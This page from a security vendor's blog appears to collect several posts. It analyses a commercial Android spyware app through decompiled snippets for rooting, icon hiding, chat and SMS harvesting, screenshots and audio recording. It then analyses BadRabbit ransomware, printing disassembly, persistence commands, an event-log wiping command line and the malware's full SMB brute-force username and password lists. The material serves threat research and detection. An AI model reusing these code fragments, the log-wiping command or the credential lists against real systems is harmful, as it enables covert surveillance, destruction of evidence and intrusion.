Sophisticated Commercial Spyware Puts User Data at Risk

Trojan spyware can eavesdrop on a user’s device to secretly steal information. There are commercial spyware apps that market themselves as benign parental control tracking/monitoring tools. These apps normally require manual installation, and are often sold on underground hacker websites. In many cases, the data collected from these apps is stored on servers that are not accessible by the users. Sometimes, the unprotected data is leaked, and the user’s privacy is put at risk. Trustlook Labs has detected a commercial spyware app that collects a large amount of user information including call logs, chat logs, and SMS messages from devices across the world

The spyware app has the following specifications:

  • MD5: 0cb7ff97e8800d4a794ed0b4402a395d
  • SHA256: 03ea783659565b3e15e2d0c461c31fda4173214151de7b01a4b04403a38a34ba
  • Size: 765214 bytes
  • App name: Android PicoTTS
  • Package name: com.procses.acores

The app needs to be installed manually, so it requests the user to activate device administrator:

image1spy

The app provides step-by-step settings for the user to choose from:

image2spy

The app will install itself as a system app if the user grants it root privilege. This makes the uninstallation process more difficult.

public static boolean a(String str) {
        boolean b = a ? a("zlsu", str) == 0 : b(str);
        Log.i(c, a ? "zlsu " : "su " + str + ":" + String.valueOf(b));
        return b;
    }
    public static boolean a(boolean z) {
        String str = "su";
        if (z) {
            str = "zlsu";
        }
        return (!z || new File("/system/bin/" + str).exists()) && a(str, "exit") == 0;
    }
[]
    public static boolean b(Context context) {
        int i = 0;
        String str = context.getPackageName() + ".apk";
        String f = f(context);
        if (f == null) {
            return false;
        }
        File file = new File(f);
        File file2 = new File(new StringBuilder(String.valueOf(context.getFilesDir().getParent())).append("/lib/").toString());
        a("mount -o rw,remount -t yaffs2 /dev/block/mtdblock3 /system");
        if (file2.exists() && file2.isDirectory()) {
            File[] listFiles = file2.listFiles();
            if (listFiles.length > 0) {
                a("chmod 777 /system/lib");
                int length = listFiles.length;
                while (i < length) {
                    File file3 = listFiles[i];
                    if (!file3.isDirectory()) {
                        b(file3.getPath(), "/system/lib/");
                        a("chmod 4755  /system/lib/" + file3.getName());
                        a("chown 1000:1000  /system/lib/" + file3.getName());
                    }
                    i++;
                }
            }
        } 

The malware can hide its icon on the device:

final class w
  implements DialogInterface.OnClickListener
{
  w(MainActivity paramMainActivity, Context paramContext) {}
  
  public final void onClick(DialogInterface paramDialogInterface, int paramInt)
  {
    if (paramInt == -1) {}
    try
    {
      this.b.getPackageManager().setComponentEnabledSetting(new ComponentName(this.b, "com.procses.acores.MainActivity"), 2, 1);
      a.b(this.b);
[]

The app is capable of collecting information from popular chat apps in China, such as:

• 易信 (Yixin)
• 微信 (WeChat)
• QQ
• HD QQ
• WhatsApp
• 陌陌 (MOMO messenger)
• YY

The code snippets below are used to collect WeChat files:

public final class bc
{
  static String a = "/tencent/MicroMsg";
  static ArrayList b;
  
  static
  {
    ArrayList localArrayList = new ArrayList();
    b = localArrayList;
    localArrayList.add("Download");
    b.add("Game");
    b.add("locallog");
    b.add("vusericon");
    b.add("wallet");
    b.add("watchdog");
    b.add("WeiXin");
    b.add("xlog");
  }
  
  public static ArrayList a()
  {
    Object localObject = new File(Environment.getExternalStorageDirectory().getPath() + a);
    ArrayList localArrayList1 = new ArrayList();
    ArrayList localArrayList2;
    int i;
    if (((File)localObject).exists())
    {
      localObject = ((File)localObject).listFiles(new bd());
      localArrayList2 = new ArrayList();
      int j = localObject.length;
      i = 0;
      if (i < j) {
        break label96;
      }
      localObject = localArrayList2.iterator();
    }
    for (;;)
    {
      if (!((Iterator)localObject).hasNext())
      {
        return localArrayList1;
        label96:
        String str2 = localObject[i];
        String str1 = str2.getPath() + "/voice";
        str2 = str2.getPath() + "/voice2";
        if (new File(str1).exists()) {
          localArrayList2.add(str1);
        }
        if (new File(str2).exists()) {
          localArrayList2.add(str2);
        }
        i += 1;
        break;
      }
      localArrayList1.addAll(a(new File((String)((Iterator)localObject).next()), new be()));
    }
  }
  
[]
  public final void onCallStateChanged(int paramInt, String paramString)
  {
    Date localDate = new Date();
    new SimpleDateFormat("yyyyMMddHHmmss").format(localDate);
    switch (paramInt)
    {
    default: 
[]
    case 2: 
      g.a(this.a, "Look_CallLog", k.b);
      return;
    }
    g.a(this.a, "Look_CallLog", k.d);
    g.g = paramString;
  }

The app also can take screenshots with the following command:

String format = this.e.format(new Date());
        String runing2 = MyClass.getRuning2(this.a);
        Log.i(this.f, runing2);
        if (this.g.containsKey(runing2)) {
            runing2 = "/data/data/" + this.c.getPackageName() + "/screencap";
            String stringBuilder = new StringBuilder(String.valueOf(SmsService.a(aq.d))).append(format).toString();
            try {
                if (MyClass.SavePic(this.c, runing2, stringBuilder, Integer.parseInt(PreferenceManager.getDefaultSharedPreferences(this.c).getString("picQuality", "5"))) && new File(stringBuilder).exists()) {
                    int a;
[]
                    options.inPreferredConfig = Config.ARGB_8888;
                    options.inSampleSize = 1;
                    if (!(i == 0 || i2 == 0)) {
                        options.inSampleSize = ((i / 15) + (i2 / 15)) / 2;
                    }
                    options.inJustDecodeBounds = false;
                    Bitmap decodeFile = BitmapFactory.decodeFile(stringBuilder, options);

The following code snippets are used to record sound:

public class RecordPhone2
  extends IRecordPhone
{
  private static MediaRecorder recorder;
  int Audio_source;
  Context ct;
  String tag = "RecordPhone2";
  
  public RecordPhone2(int paramInt)
  {
    this.Audio_source = paramInt;
  }
  
  private void releaseMediaRecorder()
  {
    if ((recorder == null) || (recording)) {}
    for (;;)
    {
      try
      {
        Log.i(this.tag, "releaseMediaRecorder");
        recorder.stop();
        recording = false;
        recorder.reset();
        recorder.release();
        recorder = null;
        return;
      }
[]
      }

The following code snippets are used to upload SMS messages:

public final class b
{
  static String a = "upload";
  static String b = "Database";
  
  public static ArrayList a(Context paramContext)
  {
    localArrayList = new ArrayList();
    try
    {
      paramContext = paramContext.openOrCreateDatabase(paramContext.getPackageName(), 0, null);
      Cursor localCursor = paramContext.query("upload", new String[] { "id", "smstype", "needDel", "ext", "title", "body", "filename", "uploaded", "date" }, "uploaded=?", new String[] { "0" }, null, null, "id");
      for (;;)
      {
        if (!localCursor.moveToNext())
        {
          localCursor.close();
          paramContext.close();
          return localArrayList;
        }
        c localc = new c();
        localc.d = localCursor.getInt(localCursor.getColumnIndex("id"));
        localc.i = localCursor.getString(localCursor.getColumnIndex("smstype"));
        localc.a = localCursor.getString(localCursor.getColumnIndex("title"));
        localc.g = localCursor.getString(localCursor.getColumnIndex("ext"));
        localc.b = localCursor.getString(localCursor.getColumnIndex("body"));
        localc.e = localCursor.getString(localCursor.getColumnIndex("filename"));
        localc.c = localCursor.getString(localCursor.getColumnIndex("uploaded"));
        localc.f = localCursor.getString(localCursor.getColumnIndex("date"));
        localc.h = localCursor.getInt(localCursor.getColumnIndex("needDel"));
        localArrayList.add(localc);
      }
      return localArrayList;
    }
    catch (Exception paramContext) {}
  }
  
[]
      localContentValues.put("needDel", Integer.valueOf(i));
      localContentValues.put("date", DateTimeHelper.FormatDateString(new Date()));
      paramContext.insert("upload", null, localContentValues);
      paramContext.close();
      return;
    }
    catch (Exception paramContext) {}
  }

The developer/vendor uses QQ (instant chat app) to communicate with the user. After the user buys the registration code, the app will be activated:

    public static boolean a(Context context, String str) {
        String a = ab.a(context);
        String a2 = ab.a(a, str);
        if (!(str == null || str == "")) {
            if (MyClass.isValidDate(a2) != null) {
                ab.a(context, "JerryRegisterCode_Key2", str, ar.i, a);
                if (a2.equals(ab.a)) {
                    SmsService.b(context, "软件已被取消激活", "╠㊣╣" + ar.a + ",当前授权时间至:" + a2);
                } else {
                    SmsService.b(context, "注册成功", "╠㊣╣" + ar.a + ",当前授权时间至:" + a2);
                }
            } else {
                SmsService.b(context, "注册失败", "未注册" + ar.a + ",注册码有误,注册不成功。提交注册码为:" + str + " 机器码为:" + ab.a(context));
            }
        }
        return true;
}

Summary
Commercial spyware apps can be used for legitimate purposes, but when put in the wrong hands, they can be effective attack tools against innocent people. These apps are often installed silently, and can take full control of a mobile device. This lets potential attackers monitor the user’s activities remotely. Trustlook’s anti-threat platform can effectively protect users against these threats.

Trustlook Selected for Top 10 Cybersecurity Solution Providers

mainlogo

Trustlook is honored and excited to be selected as a Top 10 Cybersecurity Solution Provider by The Technology Headlines. This list is published yearly, and is considered by many to be the definitive list of the world’s hottest and most innovative companies in the cybersecurity industry. This year’s list includes the following ten cybersecurity leaders:

  • Aizoon
  • BAE Systems
  • Booz Allen Hamilton
  • CyberArk
  • FireEye
  • OnBoard Security
  • Palo Alto Security
  • RSA Security
  • Secure Works
  • Trustlook

Trustlook has built a reputation for reliable cybersecurity products that are based on artificial intelligence. Our innovative SECUREai engine delivers the performance and scalability needed to provide total threat protection against malware and other forms of attack. We have products for consumers, app developers, OEMs, systems integrators, and large enterprises. We protect mobile phones, network appliances, and IoT devices.

To read the article from The Technology Headlines, please go here. To learn more about Trustlook or to schedule a demo, please visit www.trustlook.com.

2017-11-29_1059

Better Security to Drive Increase in Mobile Holiday Shopping

Shopping on mobile devices is expected to be strong during the 2017 Holiday Season, according to a new report from Trustlook. Faster network speeds, slick shopping apps, and, perhaps most significantly, the feeling of security among device owners are helping to drive this expected uptick in mobile shopping.

Continued updates to iOS and Android operating systems, as well as the proliferation of free mobile security apps, have contributed to a more secure mobile environment. Android, for instance, which represents the majority of mobile malware, is seeing fewer malware incidents, while more hackers than ever are reporting Android bugs to Google in exchange for so-called “bug bounties.”

“What jumped out the most in our study was the feeling of security between shoppers and non-shoppers,” said Allan Zhang, co-founder and CEO of Trustlook, a cybersecurity company that offers a chip-level security solution for mobile devices. “Those who feel secure on their device will shop and spend much more than those who don’t. It’s that simple.”

For the first time ever, mobile visits to retailers’ websites are expected to surpass desktop visits during the months of November and December. Still, experts warn that mobile shoppers need to be cautious, as the risk isn’t going away. “The bad guys go to where the activity is, and the activity is on mobile,” said Zhang.

Some key findings from Trustlook’s survey include:
1. 66% of users surveyed will shop on a mobile device this Holiday Season.
2. 45% of users surveyed will spend more than $250 on purchases made through a mobile device.
3. Over 80% of expected mobile shoppers either “Strongly Agreed” or “Agreed” with feeling secure, whereas for non-shoppers, the percentage was just over 50%.
4. The Home Electronics and Clothing categories are expected to see the bulk of purchases.

To see an infographic of Trustlook’s survey findings, go here. For more information on Trustlook and their AI-powered SECUREai cybersecurity platform, please visit http://www.trustlook.com.

2017-mobile-holiday-shopping-infographic

“BadRabbit” Ransomware Hits Businesses Across Europe

Trustlook Labs has investigated a ransomware outbreak dubbed “BadRabbit,” which is sweeping public organizations and businesses such as airports, banks and power utilities in Russia, Ukraine, Turkey and Bulgaria.

The malware is masked as an Adobe Flash player installer when a user clicks and downloads the file from a phishing website. The dropper (MD5: fbbdc39af1139aebba4da004475e8839) drops a DLL module into C:\Windows\infpub.dat, which is the main BadRabbit payload, and runs as C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15

0119138A  |TEST CX,CX

0119138D  \JNZ SHORT BR.01191380

0119138F  PUSH 30C                                 ; /BufSize = 30C (780.)

01191394  LEA ECX,DWORD PTR SS:[EBP-61C]           ; |

0119139A  PUSH ECX                                 ; |Buffer

0119139B  CALL DWORD PTR DS:[; \GetSystemDirectoryW

011913A1  TEST EAX,EAX

011913A3  JE BR.01191487

011913A9  PUSH BR.01196CF8                         ; /StringToAdd = "\rundll32.exe"

011913AE  LEA EDX,DWORD PTR SS:[EBP-61C]           ; |

011913B4  PUSH EDX                                 ; |ConcatString

011913B5  CALL DWORD PTR DS:[] ; \lstrcatW

011913BB  TEST EAX,EAX

011913BD  JE BR.01191487

011913C3  LEA EAX,DWORD PTR SS:[EBP-1258]

011913C9  PUSH EAX                                 ; /Arg1

011913CA  LEA ECX,DWORD PTR SS:[EBP-1254]          ; |

011913D0  CALL BR.011910C0                         ; \BR.011910C0

011913D5  TEST EAX,EAX

011913D7  JE BR.01191487

011913DD  MOV ECX,DWORD PTR SS:[EBP-1258]

011913E3  PUSH EBX

011913E4  MOV EBX,DWORD PTR SS:[EBP-1254]

011913EA  PUSH ECX                                 ; /Arg1

011913EB  CALL BR.01191260                         ; \BR.01191260

011913F0  POP EBX

011913F1  TEST EAX,EAX

011913F3  JE BR.01191487

011913F9  LEA EDX,DWORD PTR SS:[EBP-124C]

011913FF  PUSH EDX                                 ; /

01191400  PUSH BR.01196D40                         ; | = "infpub.dat"

01191405  LEA EAX,DWORD PTR SS:[EBP-61C]           ; |

0119140B  PUSH EAX                                 ; |

0119140C  LEA ECX,DWORD PTR SS:[EBP-C34]           ; |

01191412  PUSH BR.01196D58                         ; |Format = "%ws C:\Windows\%ws,#1 %ws"

01191417  PUSH ECX                                 ; |s

01191418  CALL DWORD PTR DS:[]  ; \wsprintfW

The malware also drops the files “C:\Windows\dispci.exe” and “C:\Windows\cscc.dat”. The malware creates scheduled tasks to execute the file, and the executable will install a malicious bootloader.

6C561077  PUSH DWORD PTR SS:[EBP+8]

6C56107A  PUSH EAX

6C56107B  LEA EAX,DWORD PTR SS:[EBP-618]

6C561081  PUSH infpub.6C570028                            ; UNICODE "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u "

6C561086  PUSH EAX

6C561087  CALL DWORD PTR DS:[]         ; USER32.wsprintfW

[...]

6C5682BB  LEA EAX,DWORD PTR SS:[EBP-658]

6C5682C1  PUSH EAX

6C5682C2  LEA EAX,DWORD PTR SS:[EBP-E58]

6C5682C8  PUSH infpub.6C571820                            ; UNICODE "schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00"

6C5682CD  PUSH EAX

6C5682CE  CALL DWORD PTR DS:[]         ; USER32.wsprintfW

6C5682D4  ADD ESP,14

The malware generates a random key by calling “CryptGenRandom”, then encrypts the key with the embedded RSA-2048 pubic key:

image1

The key is then used to encrypt the files on the system with the AES-128 encryption algorithm. The malware encrypts files with the following file extensions:

.3ds, .7z, .accdb, .ai, .asm, .asp, .aspx, .avhd, .back, .bak, .bmp, .brw, .c, .cab, .cc, .cer, .cfg, .conf, .cpp, .crt, .cs, .ctl, .cxx, .dbf, .der, .dib, .disk, .djvu, .doc, .docx, .dwg, .eml, .fdb, .gz, .h, .hdd, .hpp, .hxx, .iso, .java, .jfif, .jpe, .jpeg, .jpg, .js, .kdbx, .key, .mail, .mdb, .msg, .nrg, .odc, .odf, .odg, .odi, .odm, .odp, .ods, .odt, .ora, .ost, .ova, .ovf, .p12, .p7b, .p7c, .pdf, .pem, .pfx, .php, .pmf, .png, .ppt, .pptx, .ps1, .pst, .pvi, .py, .pyc, .pyw, .qcow, .qcow2, .rar, .rb, .rtf, .scm, .sln, .sql, .tar, .tib, .tif, .tiff, .vb, .vbox, .vbs, .vcb, .vdi, .vfd, .vhd, .vhdx, .vmc, .vmdk, .vmsd, .vmtm, .vmx, .vsdx, .vsv, .work, .xls, .xlsx, .xml, .xvd, .zip

The malware skips the files under the following directories:

\Windows
\Program Files
\ProgramData
\AppData

The ransom message “Readme.txt” is written in the root of drives.

After the scheduled task reboots the system, the following ransom note is shown on the system:

image2

The malware run “wevtutil” and “fsutil” commands to clean event logs:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:

The malware also attempts to affect the system on the network. It uses the following embedded username/password to do a brute-force login into the other system over SMB.

Usernames:
alex
netguest
superuser
nasadmin
nasuser
nas
ftpadmin
ftpuser
asus
backup
operator
other user
work
support
manager
rdpadmin
rdpuser
rdp
ftp
boss
buh
root
Test
user-1
User1
User
Guest
Admin
Administrator

Passwords:
god
sex
secret
love
321
123321
uiop
zxcv
zxc321
zxc123
zxc
qwerty123
qwerty
qwert
qwer
qwe321
qwe123
qwe
777
77777
55555
111111
password
test123
admin123Test
Admin123
user123
User123
guest123
Guest123
administrato
Administrato
1234567890
123456789
12345678
1234567
123456
12345
1234
123
test
adminTest
user
guest
administrator

Hashes (MD5)
Trustlook Labs has identified the following hashes associated with BadRabbit:

Dropper:
fbbdc39af1139aebba4da004475e8839

Payload:
1d724f95c61f1055f0d02c2154bbccd3 c:\Windows\infpub.dat
b14d8faf7f0cbcfad051cefe5f39645f c:\Windows\dispci.exe
b4e6d97dafd9224ed9a547d52c26ce02 c:\Windows\cscc.dat

Summary
The ability to spread via SMB makes the BadRabbit ransomware particularly destructive, as it can infect systems in the network very quickly and easily. It is further proof that ransomware, with its monetary incentives, continues to be the trend of malware developed by criminal hackers. Thankfully, Trustlook’s antivirus engine can effectively detect ransomware attacks and protect our customers.